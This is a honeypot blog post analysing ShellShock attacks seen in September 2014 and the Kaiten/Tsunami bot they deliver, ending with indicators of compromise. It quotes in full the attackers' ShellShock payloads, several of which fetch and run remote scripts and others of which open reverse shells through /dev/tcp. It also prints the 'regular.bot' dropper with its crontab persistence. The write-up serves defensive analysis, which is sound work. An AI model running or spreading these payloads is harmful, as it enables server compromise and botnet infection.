ShellShock – Hello Honeypot

ShellShock & Linux.Backdoor.Kaiten
Ok, today, I got an alert from one of my honeypots and I was overwhelmed to see, that, it was a ShellShock call 🙂

This post is going to be very rudimentary, as I want to first get the information out to as many as I can.

Here is what my log alert that my honeypot picked up:

28-09-2014 09:43:55,121.9.244.212,() { :;}; /bin/bash -c “wget http[:]//stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http[:]//stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh”,

Update: I got 2 more alerts from my honeypot

29-09-2014 07:43:08,
,67.227.0.73,() { :;}; /bin/bash -c “wget -P /var/tmp 174.143.240.43/…/x ; perl /var/tmp/x”,

29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c “echo testing9123123”; /bin/uname -a

So being curious, I looked up first to find out who is 121.9.244.212 and it results to “CHINANET-GD”

Next, comes the big main thing:

() { :;}; /bin/bash -c “wget http[:]//stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http[:]//stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh

The command represents where the remote attacker is trying to (or)  inject malicious code; arbitrary code following a function definition to download a file to the /tmp directory with a file called ‘sh’.

Whats in the file?

$ cat regular.bot

killall perl

wget http://stablehost.us/bots/kaiten.c -O /tmp/a.c;

curl -o /tmp/a.c http://stablehost.us/bots/kaiten.c;

gcc -o /tmp/a /tmp/a.c;

/tmp/a;

rm -rf /tmp/a.c;

wget http://stablehost.us/bots/a -O /tmp/a;

curl -o /tmp/a http://stablehost.us/bots/a;

chmod +x /tmp/a;

/tmp/a;

wget http://stablehost.us/bots/darwin -O /tmp/d;

curl -o /tmp/d http://stablehost.us/bots/darwin;

chmod +x /tmp/d;

/tmp/d;

wget http://stablehost.us/bots/pl -O /tmp/pl;

curl -o /tmp/pl http://stablehost.us/bots/pl;

perl /tmp/pl;

rm /tmp/pl;

echo “@weekly curl -o /tmp/sh http://stablehost.us/bots/regular.bot;wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh” >/tmp/c;

crontab /tmp/c;

rm /tmp/c;

So, now once downloaded, its going to be doing a series of tasks.

Download a  “.C” file and compile it using “gcc”.
sandbox-mac:dump user$ md5 kaiten.c
MD5 (kaiten.c) = e5807250e25da45e287afb2f1e4580d6

Download 2 binary files:
“a”   MD5 (a) = 7390a1e62a88eb80b5fae80c9eb00be7 – Backdoor.Linuz/Tsunami
“darwin”  MD5 (d) = adacf1fa8cd7f77ae83ba38a99160bdb – Backdoor:OSX/Tsunami.A

Makes it executable and executes them.

Next it brings down a Perl file (pl) and executes the perl file
sandbox-mac:dump user$ md5 pl
MD5 (pl) = 0c25bee177101b4235022d694c0de4d3

The perl file, basically checks for other vulnerabilities, does port scanning, check news from packet storm, Install Socks5, does nmap, sql scanner, checks if the box is root-able, open up IRC channels, does TCP/UDP/Http Floods based on commands received from Master,  do Scanning activity to domains like, MSN,  AlltheWeb, Ask, AOL, Lycos, Yahoo, etc.

The commands to send are:

IRC Names:

And then do a weekly refresh of the bot activity or updates using crontab.

Whois stablehost.us

Stablehost.us is registered to a gentleman in the US since Mar-16-2010.  It runs Apache on Ubuntu

$ curl -I stablehost.us

HTTP/1.1 200 OK

Date: Sun, 28 Sep 2014 07:33:15 GMT

Server: Apache/2.4.7 (Ubuntu)

Last-Modified: Sat, 27 Sep 2014 19:57:07 GMT

ETag: “0-50411703b49e2”

Accept-Ranges: bytes

Content-Type: text/html

At the time of writing this article, the website is empty, probably with a blank index page (200 OK). The directory that serves the bots is also probably having a blank index page.

$ curl -I http://stablehost.us/bots/

HTTP/1.1 200 OK

Date: Sun, 28 Sep 2014 07:38:23 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.4

Content-Type: text/html

According to way-back machine, there are/were only 3 edits/snapshots in the entirety of the domain life.

Wayback Machine Results

2 Blank page updates on March 1, 2011 & Aug 27, 2011 and 1 Apache test page on Jan 10, 2014.

Here is where it gets more interesting. I can confirm that this domain was purely used for bot activity.

According to the way back machine March 1, 2011 we can see the bot directory in there with the perl file and the regular.bot file

Wayback Machine Bot directory Results

After a new bot addition

In Conclusion:

We have 1 more pattern:

121.9.244.212 – CHINANET
ShellShock Command: () { :;}; /bin/bash -c “wget http[:]//stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http[:]//stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh”

In addition to these:

67.229.128.88 – Krypt Technologies (US)
Shellshock Command: () { :; }; /bin/bash -i > /dev/tcp/67.229.128.88/9527 0<&1 2>&1

153.121.58.243 – Sakura Internet (Japan)
Shellshock Comand: () { :; }; /bin/bash -i >& /dev/tcp/153.121.58.243/443 0>&1

82.99.57.32 – Datasmeden (Sweden)
Shellshock Commands:
() { :;}; /bin/bash -i >& /dev/tcp/82.99.57.32/443 0>&1
() { :;}; /bin/bash -c “/bin/bash -i >& /dev/tcp/82.99.57.32/443″
() { :;}; /bin/bash -c “/bin/bash -i >& /dev/tcp/82.99.57.32/443 0>&1″

114.96.140.114 – Chinanet Anhui Province Network (China)
Shellshock Command: () { :; }; /usr/bin/bash -i >& /dev/tcp/114.96.140.114/6032 0>&1

113.10.223.171 – NWT iDC Data Service (Hong Kong)
Shellshock Command: () { :; }; /bin/bash -i > /dev/tcp/113.10.223.171/8080 0<&1 2>&1

Some Indicators that we can look for in our web/proxy logs:

IP addresses:

  • 121.9.244.212 (ISP)
  • 89.33.193.10 (PERL BOT)
  • 142.4.215.115 ( { :;}; /bin/bash -c “cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji”)
  • 67.227.0.73
  • 174.143.240.43
  • 54.64.179.8
  • 54.251.83.67
  • 142.0.41.57
  • 153.121.58.243
  • 67.229.128.88
  • 67.227.0.74
  • 82.99.57.32
  • 114.96.140.114
  • 113.10.223.171
  • 104.192.103.6
  • 72.167.37.182
  • 204.232.241.139
  • 46.161.41.142
  • 75.127.84.182
  • 37.187.225.119
  • 195.225.34.101
  • 202.137.176.146
  • 81.18.135.38
  • 94.102.52.10
  • 82.118.242.223
  • 142.4.215.115
  • 201.205.255.56
  • 83.96.168.161
  • 199.27.89.22
  • 5.135.127.38
  • 103.28.36.123
  • 82.80.195.86
  • 89.207.135.125
  • 194.54.9.11
  • 173.45.100.18
  • 192.227.213.66
  • 70.42.149.72

Web Requests: (some of the hardcoded urls in the perl file)

  • http://stablehost.us
  • http://singlesaints.com
  • http://search.hotbot.de/cgi-bin/pursuit?pag=<some_val>&query=”
  • http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=
  • http://www.mozbot.fr/search?q=
  • http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=
  • http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=
  • http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=
  • http://busca.uol.com.br/www/index.html?q=
  • http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=

Hope this helps.

Update (29/Sep/2014): Stablehost.us is down!

$ curl -I stablehost.us

curl: (6) Could not resolve host: stablehost.us

Leave a Reply

Your email address will not be published. Required fields are marked *